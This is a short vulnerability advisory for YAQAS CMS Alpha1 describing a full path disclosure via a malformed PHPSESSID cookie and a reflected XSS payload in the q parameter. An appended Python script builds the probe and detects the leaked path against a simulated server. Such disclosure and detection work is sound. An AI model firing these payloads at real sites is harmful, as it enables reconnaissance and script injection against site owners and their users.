# TITLE ....... # Yaqas CMS Alpha1 Information Disclosure
# DATE ........ # 25.03.2012
# AUTHOR ...... # http://hauntit.blogspot.com
# SOFT LINK ... # YAQAS - Yet Another Question & Answer System @ google
# SOFT Copyright# "(C) 2012 Karpouzas George" *
# VERSION ..... # Alpha1
# TESTED ON ... # LAMP
# .....................................................................
#
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?

This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?

# 2.1 information disclosure (full path disclosure)

If we send a cookie with PHPSESSID=%3b)() (the ';' is URL-encoded because a raw ';' would end the cookie value), PHP's session_start() rejects the session id and, when the server is configured to display errors, prints a warning into the response. The warning may be visible only in the page source, and it leaks the absolute installation path:

"Warning: session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /your/www/yaqas-release-alpha1/src/lib/session.php on line 32"

Note that the message itself comes from PHP, not from YAQAS; the application's part is that src/lib/session.php passes the cookie straight to session_start() without checking it, so any install with display_errors on leaks its path to an unauthenticated request.

# 2.2 btw: reflected XSS in the q parameter

http://yaqas-release-alpha1/src/index.php?q=%29%2f*%20]]%3E%20*%2f%3Cimg%20src%3dxxx%20onerror%3dalert%28123123123123%29%3E&type=nhf

URL-decoded, the q value is:

)/* ]]> */<img src=xxx onerror=alert(123123123123)>

The payload is built to close a JavaScript expression and a CDATA section (the ")/* ]]> */" prefix) before injecting an <img> tag whose onerror handler runs the alert, which suggests q is reflected inside a <script> block on that page.

#............................................#
# 3. Where is bug :)

See the warning in 2.1: the session_start() call in src/lib/session.php, line 32.

#............................................#
# 4. More...

- (*) from license : YAQAS - Yet Another Question & Answer System // Copyright (C) 2012 Karpouzas George
- http://www.google.com
- http://hauntit.blogspot.com
- http://portswigger.net

#............................................#
# Ask me about new projects...
#
# Best regards
#
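The check from 2.1 as a small added example (my code, not part of the advisory or of the YAQAS code base): it builds the probe request with the malformed PHPSESSID, mirrors PHP's session-id character rule as quoted in the warning, and extracts the leaked path and line number from a response. Because it has to run offline, the "server" is a constructed stand-in that behaves like a LAMP host with display_errors on (and, for contrast, off); the host name and install path are the ones the advisory uses, and the HTML wrapping of the warning follows PHP's html_errors format, which is an assumption about the real page.

```python
"""Added example, not from the advisory or YAQAS: offline check for the
PHPSESSID path-disclosure described in section 2.1."""
import re
from urllib.parse import unquote

# Characters PHP's session_start() accepts in a session id, per the warning
# quoted in the advisory (a-z, A-Z, 0-9, '-' and ','). The length limit that
# the same warning mentions is not modelled here.
VALID_SID_RE = re.compile(r"^[A-Za-z0-9,-]+$")

# The PHP warning text from the advisory. The optional <b>/</b> tags cover the
# case where PHP renders errors as HTML and the leak is only visible in the
# page source; the path and line number are the information that leaks.
WARNING_RE = re.compile(
    r"Warning(?:</b>)?:\s+session_start\(\): The session id is too long or "
    r"contains illegal characters, valid characters are a-z, A-Z, 0-9 and "
    r"'-,' in (?:<b>)?(?P<path>/[^\s<]+)(?:</b>)? on line (?:<b>)?(?P<line>\d+)"
)

# Assumed install path (taken from the advisory's sample warning).
INSTALL_PATH = "/your/www/yaqas-release-alpha1/src/lib/session.php"


def is_valid_session_id(sid: str) -> bool:
    """Mirror PHP's character check so probes can be chosen deliberately."""
    return bool(VALID_SID_RE.match(sid))


def build_probe_request(host: str, sid: str = "%3b)()") -> str:
    """Raw HTTP/1.1 request carrying the advisory's PHPSESSID probe.
    ';' is sent as %3b: a raw ';' would terminate the cookie value, while PHP
    URL-decodes cookie values before session_start() sees them."""
    return (
        "GET /src/index.php HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: PHPSESSID={sid}\r\n"
        "Connection: close\r\n\r\n"
    )


def extract_disclosed_path(body: str):
    """Return (absolute path, line number) leaked by the warning, or None.
    Searches the raw body, not rendered text, since the warning may sit
    inside markup that the browser does not display."""
    m = WARNING_RE.search(body)
    if not m:
        return None
    return m.group("path"), int(m.group("line"))


def fake_yaqas_response(request: str, display_errors: bool = True) -> str:
    """Constructed stand-in for the target (assumption, not real YAQAS code):
    with display_errors on, an invalid session id makes PHP print the warning
    into the response; with display_errors off it goes to the log only, which
    is the server-side mitigation for this disclosure."""
    m = re.search(r"Cookie: PHPSESSID=([^\r\n;]*)", request)
    sid = unquote(m.group(1)) if m else ""
    body = "<html><body>YAQAS</body></html>"
    if sid and not is_valid_session_id(sid) and display_errors:
        body = (
            "<br />\n<b>Warning</b>:  session_start(): The session id is too "
            "long or contains illegal characters, valid characters are a-z, "
            f"A-Z, 0-9 and '-,' in <b>{INSTALL_PATH}</b> on line <b>32</b>"
            "<br />\n" + body
        )
    return body


def run_check(sid: str = "%3b)()", display_errors: bool = True):
    """Send the probe to the stand-in server and report what leaked."""
    req = build_probe_request("yaqas-release-alpha1", sid)
    return extract_disclosed_path(fake_yaqas_response(req, display_errors))


if __name__ == "__main__":
    print("display_errors on :", run_check())
    print("display_errors off:", run_check(display_errors=False))
    print("valid session id  :", run_check(sid="abc123"))
```

Against a real host you would replace fake_yaqas_response with the actual HTTP round trip and keep extract_disclosed_path as the detection step; the same VALID_SID_RE is also the check the application should apply to the cookie before calling session_start(), so the warning is never raised in the first place.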